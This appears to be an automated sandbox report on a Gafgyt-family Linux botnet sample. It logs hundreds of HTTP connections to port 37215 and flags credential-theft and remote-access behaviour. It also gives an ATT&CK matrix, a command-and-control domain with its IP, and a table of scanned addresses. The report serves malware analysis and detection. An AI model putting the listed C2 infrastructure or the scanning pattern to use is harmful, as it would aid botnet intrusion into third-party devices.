          Source: unknownNetwork traffic detected: HTTP traffic on port 56760 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47300 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48626 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58694 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58066 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42524 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35732 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41988 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44032 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42904 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51408 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49630 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57014 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54512 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49512 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52700 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32950 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52576 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54316 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34962 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37494 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43112 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44358 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54734 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57070 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41968 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48642 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34768 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37562 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57416 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33846 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52176 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60532 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56900 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46838 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42698 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36374 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40906 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45982 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47176 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53130 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45866 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55640 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48768 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56388 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39752 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57908 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57446 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56500 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46302 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46006 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56854 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42276 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48322 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41728 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36584 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32772 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37750 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47954 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38540 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38846 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44064 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43008 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57836 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53382 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33030 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41750 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35030 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52884 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53388 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43388 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52654 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39920 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41130 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47442 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41572 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48244 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39590 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43408 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60322 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57548 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54908 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55238 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40464 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43996 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47728 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44782 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40706 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56292 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40540 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39922 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41156 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53996 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53686 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55792 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47344 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43148 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39434 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35400 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45120 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48860 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33846 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39682 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48840 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57268 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58064 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46602 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40628 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52308 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48022 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59488 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42750 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42296 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43474 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35950 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54608 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38374 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41166 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58782 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47404 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53012 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55322 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40342 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33370 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51874 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48700 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47936 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59788 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38036 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59790 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56312 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33476 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41172 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53936 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44246 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47610 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40038 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35588 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36992 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44230 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58936 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46476 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37332 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44098 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36372 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43342 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50768 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48252 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59738 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39174 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40518 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57606 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55210 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54092 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50662 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37698 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39306 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46120 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51178 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43072 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47660 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58558 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34230 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40220 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57536 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59060 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44044 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34960 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55878 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37526 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45026 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35364 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36388 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35400 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55742 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33052 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45276 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48670 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40100 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58592 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51930 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40350 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42770 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47182 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33922 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55630 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49032 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38792 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53394 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51710 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33936 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60412 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48244 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56690 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46658 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57854 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55858 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35732 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56042 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34702 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45098 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40660 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58358 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43284 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34028 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36398 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34516 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51890 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44022 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33770 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53444 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33146 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54746 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35204 -> 37215

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: x86.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: x86.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
          OS Credential Dumping
          System Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448550 Sample: x86.nn.elf Startdate: 28/05/2024 Architecture: LINUX Score: 92 18 166.71.26.196 XMISSIONUS United States 2->18 20 66.7.38.159 WINDSTREAMUS United States 2->20 22 99 other IPs or domains 2->22 24 Snort IDS alert for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 4 other signatures 2->30 8 x86.nn.elf 2->8         started        signatures3 process4 process5 10 x86.nn.elf 8->10         started        process6 12 x86.nn.elf 10->12         started        14 x86.nn.elf 10->14         started        16 x86.nn.elf 10->16         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          x86.nn.elf100%AviraEXP/ELF.Gafgyt.X
          x86.nn.elf100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          telnet.8b8n.com
          91.92.249.80
          truefalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/x86.nn.elffalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/soap/envelope/x86.nn.elffalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            197.179.229.49
            unknownKenya
            33771SAFARICOM-LIMITEDKEfalse
            17.88.42.193
            unknownUnited States
            714APPLE-ENGINEERINGUSfalse
            205.199.86.25
            unknownUnited States
            133847ICT-AS-APAnppleTechEnterpriseMYfalse
            41.30.192.121
            unknownSouth Africa
            29975VODACOM-ZAfalse
            32.67.87.8
            unknownUnited States
            17224ATT-CERFNET-BLOCKUSfalse
            153.160.179.48
            unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
            194.71.174.238
            unknownSweden
            3246TDCSONGTele2BusinessTDCSwedenSEfalse
            120.8.121.189
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
            41.121.55.94
            unknownSouth Africa
            16637MTNNS-ASZAfalse
            220.209.8.235
            unknownJapan2510INFOWEBFUJITSULIMITEDJPfalse
            79.71.144.147
            unknownUnited Kingdom
            9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
            223.50.76.178
            unknownKorea Republic of
            9644SKTELECOM-NET-ASSKTelecomKRfalse
            61.213.40.47
            unknownJapan17682CABLENET296296BROADNETComIncJPfalse
            159.172.194.65
            unknownUnited States
            28686AVECTRIS-ASCHfalse
            19.76.235.216
            unknownUnited States
            3MIT-GATEWAYSUSfalse
            181.192.212.147
            unknownColombia
            17069CoopTelefonicaVillaGesellLtdaARfalse
            197.116.123.80
            unknownAlgeria
            36947ALGTEL-ASDZfalse
            67.215.233.1
            unknownUnited States
            8100ASN-QUADRANET-GLOBALUSfalse
            17.32.131.17
            unknownUnited States
            714APPLE-ENGINEERINGUSfalse
            200.99.19.193
            unknownBrazil
            15180UOLDIVEOSABRfalse
            166.115.85.6
            unknownUnited States
            58681NSWPOLSERV-AS-APNewSouthWalesPoliceAUfalse
            13.73.103.113
            unknownUnited States
            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            138.183.141.93
            unknownUnited States
            647DNIC-ASBLK-00616-00665USfalse
            24.16.110.61
            unknownUnited States
            7922COMCAST-7922USfalse
            129.225.96.138
            unknownUnited States
            6071UNISYS-AS-EUSfalse
            143.22.63.175
            unknownUnited States
            11003PANDGUSfalse
            40.14.18.112
            unknownUnited States
            4249LILLY-ASUSfalse
            41.87.198.28
            unknownSouth Africa
            37315CipherWaveZAfalse
            157.237.19.104
            unknownNorway
            2119TELENOR-NEXTELTelenorNorgeASNOfalse
            52.200.60.244
            unknownUnited States
            14618AMAZON-AESUSfalse
            46.126.175.142
            unknownSwitzerland
            6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
            174.106.174.2
            unknownUnited States
            11426TWC-11426-CAROLINASUSfalse
            197.216.246.240
            unknownAngola
            11259ANGOLATELECOMAOfalse
            120.123.201.248
            unknownTaiwan; Republic of China (ROC)
            17716NTU-TWNationalTaiwanUniversityTWfalse
            163.60.253.117
            unknownJapan2516KDDIKDDICORPORATIONJPfalse
            145.241.91.93
            unknownSwitzerland
            8447TELEKOM-ATA1TelekomAustriaAGATfalse
            77.150.213.51
            unknownFrance
            15557LDCOMNETFRfalse
            166.99.165.150
            unknownUnited States
            11719EATON-CORPORATIONUSfalse
            213.51.243.56
            unknownNetherlands
            33915TNF-ASNLfalse
            24.57.31.155
            unknownCanada
            7992COGECOWAVECAfalse
            51.254.247.182
            unknownFrance
            16276OVHFRfalse
